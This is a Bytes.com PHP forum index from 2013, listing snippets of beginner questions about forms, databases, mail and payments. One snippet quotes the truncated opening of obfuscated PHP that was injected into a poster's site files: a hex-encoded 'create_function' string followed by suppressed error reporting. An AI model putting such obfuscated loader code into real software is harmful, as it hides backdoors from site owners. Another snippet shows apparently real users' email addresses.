473,549 Members | 2,531 Online
Bytes | Software Development & Data Engineering Community
+ Post

Home Posts Topics Members FAQ

PHP Forum

PHP web programming language - Ask questions about php scripting, databases, mysql, templates, PEAR, php functions, PHP-GTK, setup and installation, object oriented programming, classes, files, security, sessions, arrays and more.
0
1,202
thread by: Ankita Malu | last post May 7 '13 by: Ankita Malu
Hi friends, I have a drop down list which contains Country that i get values of country through store procedure Now i Have another combobox that have operators that also i have to get through store procedure but one condition is that when i select country i get only operators of that country not all operators Please help me out; i am new to...
0
1,517
thread by: larryoliver | last post May 10 '13 by: larryoliver
PHP form function works on my home server. When uploaded to clients' SSL/TLS yahoo server the form function react appropriately but does not send out the emails. The contact page is: http://suninteg.com/contact.php I can only think the mail is being held up by a security protocol on the server? I dunno. the PHP code is as follows: ...
0
1,240
Niheel
thread by: Niheel | last post May 15 '13 by: Niheel
What are your thoughts on Google's addition of PHP to app engine? Smart (with it's abundance of developers and applications)? or a step back for web development languages? Google App Engine adds the PHP runtime
0
1,029
thread by: kunal choudhary | last post May 17 '13 by: kunal choudhary
I want to know how to update a database by editing of retrieval through populated drop down menu.after searching a lot it could not work.so please help me. <?php while($row1 = @mysql_fetch_array($aCustomer,MYSQL_ASSOC)) { echo "&nbsp;&nbsp;&nbsp;head &nbsp;<input type='text' name='head' value='".$row1."'><br/><br/>"; echo...
0
1,248
thread by: sourcy | last post May 18 '13 by: sourcy
Hi everybody, My name is Andrew and I'm a beginner at PHP. What I'm doing is trying to get a form to check Captcha, send the form contents by email, and then have PHP redirect to the correct page. I've been on this one for hours on end but I can't figure it out. I'm not that good of a PHP programmer (yet), but here goes what I got: ...
0
1,748
thread by: impin | last post May 24 '13 by: impin
i have table cresults. email marks last_submit pooja23@gmail.com 9 2013-05-24 rajletsgetlost@gmail.com 5 2013-05-24 romancingtherain@gmail.com 5 2013-05-24 vidhya.vs@gmail.com 8 2013-05-24
0
1,031
thread by: malika | last post May 25 '13 by: malika
hi my problem is that how can i fetch the values from for each loop for further computation <?php if (isset($_POST)) { $data_t1 = $_POST; foreach ($data_t1 as $key => $value) {
0
1,153
thread by: malika | last post May 25 '13 by: malika
hi everyone i fetch the array by using foreach loop now how can i define the index of different elements in array for futher computation like i want the element1 of array 1 to be divided by element1 of array 2 code of for each loop <?php if (isset($_POST)) { $data_t1 = $_POST; foreach ($data_t1 as $key => $value) {
0
937
thread by: thiagorisan | last post May 27 '13 by: thiagorisan
Good day Friends community. I wonder if anyone knows how I can free bids free to those who register in BPPENNYAUTOBID. I would like to release the maximum possible bids. In the work, no charge for bids, but the products in the auction, then it would be very good to bidding or free instead of having to put them manually one by one. Does...
0
1,146
thread by: aroojnazir33 | last post May 31 '13 by: aroojnazir33
When I add php code to ckeditor in opencart from the information page it places !-- at the beginning and end of php code. It doesnot execute the php code. However it works well with js, css and html code. I dont want to use MVC model rather I want to place php and html code at the same place. Can anyone help me how to do it or change ckeditor...
0
1,024
thread by: swetha851991 | last post Jun 4 '13 by: swetha851991
how to transfer contol to the next row of a resultset storing blob data?(php)
0
1,067
thread by: rahulpragma | last post Jun 5 '13 by: rahulpragma
REF: https://en.wikipedia.org/wiki/Content_delivery_network A content delivery network or content distribution network is a system of computers where our website is stored so it’s data (images/videos) can be served from multiple locations. However I dont want to use any online paid/unpaid CDN services but would like to setup CDN on my own high...
0
944
thread by: hemal8888 | last post Jun 7 '13 by: hemal8888
hello all, i want know about this question "how can apply express checkout paypal integration using hidden varible? " i fond this answer but i am not satisfied with answer. in below i given you demo code i want nedd using this.. orm action='https://api-3t.sandbox.paypal.com/nvp' method='post' name='frmPayPal1'><!-- found on top -->...
0
1,232
ditditsasa
thread by: ditditsasa | last post Jun 14 '13 by: ditditsasa
Hi, Please tell me there is any free plugins for woocommerce quantity based on discounts. For example, If user buys 3 leather leashes he should get 20% discount same if he buys 10 he should get more discount Thanks,
0
1,046
thread by: karimkhan | last post Jun 20 '13 by: karimkhan
I tried to create php extension using VS2010, wamp server and php. Project I created following the step given at : http://www.dreamincode.net/forums/topic/244215-introduction-to-creating-a-php-extension-for-windows/ was successful and projectname.dll file created. I am using: Apache/2.2.22 (Win32) PHP/5.4.3 I copied this dll file into...
0
1,179
thread by: kemppdog | last post Jun 20 '13 by: kemppdog
All of the PHP files in our website have developed error reports at the top that are hundreds of lines long. There is also content disappearing from the bottom of some of the webpages. The error report starts like this <?php $zend_framework="\x63\162\x65\141\x74\145\x5f\146\x75\156\x63\164\x69\157\x6e"; @error_reporting(0);...
0
1,167
thread by: swetha851991 | last post Jun 26 '13 by: swetha851991
How to add a new form in orangehrm under C:\wamp\www\orangehrm-3.0.1\symfony\plugins\orangehrmAdminPlugin\lib\form\?.I have already created templates and action files..I am unable to create a form so now am getting a blank screen when I click the link to my new form.Please help me..Thanks in advance.
0
1,011
thread by: manjava | last post Jul 1 '13 by: manjava
Hello, I have the file WSDL http://ws.availpro.com/BookingEngine/Availabilities/2009A/AvailabilityService.asmx?wsdl How can I create the client php for this web service? Thanks in advance
0
1,101
thread by: bernouli | last post Jul 10 '13 by: bernouli
This code crawls only the url of the domain of a site eg www.example.com/orange-is-good.html and will display word on the url based on searched word.Now how do i make it to crawl for keywords, description, title,body content of pages images via title, alt,form headers(eg h1 to h7), anchor links etc. <!DOCTYPE HTML PUBLIC...
0
1,030
thread by: amskape | last post Jul 14 '13 by: amskape
Dear Friends, I need a payment integration method except paypal which connect to banks for a local site in Kerala,India. If you know any thing please let me know. Thanks, Anes
0
3,625
thread by: karimkhan | last post Jul 16 '13 by: karimkhan
I have created php code which shows google chart when page is loaded using mysql data and php. I want ajax_form_temp.php has button on which one click then chart should appear without page load using ajax. I am confused that what function should be called on formsubmit() event and where to code ajax part. Any kinds of help is heartly...
0
1,263
thread by: swetha851991 | last post Jul 26 '13 by: swetha851991
How to handle firebird events in php?I have used ibase_set_event_handler($link, "event_handler", "INSERTED", "DB_SHUTDOWN")But this function is not working in my program. My program is given below. <?php function event_handler($event_name, $link) { if ($event_name == "INSERTED") { // process new order ...
0
1,230
thread by: MadSma | last post Jul 29 '13 by: MadSma
Hi, noob in need of assistance.. i want to be able to create three combo boxes that are filled dynamically from my tables but each selection box to be "restrained" by the value fo the previous selection. for examble combo1 Categories (display all my categories)ok combo2 Subcategory( display only subcategories of the previous selected...
0
1,133
thread by: akindeji isola | last post Aug 2 '13 by: akindeji isola
Sir/ Ma,how can php code post my dropdown list data from html to my database file. The reason being that i wrote a code using '<select> </select>' and '<option></option>" keywords to generate a dropdown lists of data, but my php does not post these data into the database file. pls what can i do or what line of code can i write to see those data...
0
1,015
thread by: maniakit | last post Aug 16 '13 by: maniakit
Talking about converting from image file as .jpg to longblob data (mysql) and than displaying it to browser is finding everywhere. But how to make longblob data into image file again is rarely or nothing. Because, until now, I don't find any articles about it. Anybody can help me to teach me how to to make longblob data into image file again? ...

By using Bytes.com and it's services, you agree to our Privacy Policy and Terms of Use.

To disable or enable advertisements and analytics tracking please visit the manage ads & tracking page.